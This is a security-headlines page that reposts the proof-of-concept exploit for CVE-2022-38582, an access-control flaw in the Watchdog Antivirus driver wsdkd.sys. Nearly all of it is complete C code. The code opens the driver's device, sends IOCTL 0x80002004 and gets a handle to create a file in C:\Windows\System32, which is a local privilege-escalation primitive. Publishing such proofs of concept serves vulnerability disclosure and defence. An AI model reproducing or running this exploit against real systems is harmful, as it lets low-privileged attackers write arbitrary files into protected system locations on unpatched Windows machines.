Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38582: PoC for Watchdog AV (CVE-2022-38582)

Incorrect access control in the anti-virus driver wsdkd.sys of Watchdog Antivirus v1.4.158 allows attackers to write arbitrary files.

CVE
Open in Source
#windows#ssh

// exploitation will require issuing the described IOCTL // once complete, a low integrity user may obtain write-privileges to the file // by re-opening with CreateFileA / NtCreateFile #include <Windows.h> #include <stdio.h> #define IOCTL_WAV_CREATE_FILE 0x80002004 const char* g_DeviceName = R"(\\.\wsdk)"; BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle); typedef struct WSDK_CREATE { DWORD dwDisposition; DWORD dwAccessMask; // 0x10 BYTE reserved0[0x6c]; WCHAR wstrFileName[MAX_PATH + 1]; } WSDK_CREATE, * PWSDK_CREATE; typedef struct WSDK_CREATE_OUT { HANDLE hFile; NTSTATUS status; }WSDK_CREATE_OUT, * PWSDK_CREATE_OUT; BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle) { DWORD dwBytesReturned = 0; HANDLE hHeap = GetProcessHeap(); if (!lpOutHandle) { return FALSE; } LPVOID lpOutBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000); if (!lpOutBuffer) { return FALSE; } PWSDK_CREATE lpCreateArgs = (PWSDK_CREATE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(WSDK_CREATE)); if (!lpCreateArgs) { HeapFree(hHeap, 0, lpOutBuffer); return FALSE; } lpCreateArgs->dwAccessMask = 1; lpCreateArgs->dwDisposition = 0; memcpy(lpCreateArgs->wstrFileName, strFileName, lstrlenW(strFileName) * sizeof(wchar_t)); BOOL bRes = DeviceIoControl( hDevice, IOCTL_WAV_CREATE_FILE, lpCreateArgs, sizeof(WSDK_CREATE), lpOutBuffer, 0x1000, &dwBytesReturned, NULL ); if (!bRes) { printf("DeviceIoControl - %x\n", GetLastError()); return FALSE; } PWSDK_CREATE_OUT lpOutInfo = (PWSDK_CREATE_OUT)lpOutBuffer; if (lpOutInfo->hFile && !lpOutInfo->status) { *lpOutHandle = lpOutInfo->hFile; HeapFree(hHeap, 0, lpOutBuffer); HeapFree(hHeap, 0, lpCreateArgs); return TRUE; } HeapFree(hHeap, 0, lpOutBuffer); HeapFree(hHeap, 0, lpCreateArgs); return FALSE; } int main() { HANDLE hDevice = CreateFileA( g_DeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (!hDevice || hDevice == INVALID_HANDLE_VALUE) { printf(“CreateFileA - %x\n", GetLastError()); return -1; } HANDLE hFile = 0; BOOL bResult = WAV_CreateFile(hDevice, LR”(\??\C:\Windows\System32\lmfao.dll)", FALSE, &hFile); if (bResult) { printf("Got handle to file: %p\n", hFile); } return 0; }

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE